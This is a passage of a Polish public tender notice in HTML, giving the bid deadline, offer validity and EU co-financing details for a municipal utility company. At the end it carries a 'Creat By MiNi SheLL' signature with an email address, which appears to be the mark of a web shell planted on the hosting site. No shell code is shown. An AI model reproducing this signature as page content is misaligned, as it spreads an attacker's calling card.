<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Eksploatacji Urządzeń Komunalnych Sp. z o. o., ul. Zbąszyńska 15, 64-212 Siedlec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2012 godzina 10:00, miejsce: Zakład Eksploatacji Urządzeń Komunalnych Sp. z o. o., ul. Zbąszyńska 15, 64-212 Siedlec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o dofinansowanie inwestycji będącej przedmiotem zamówienia ze środków Unii Europejskiej w ramach Programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com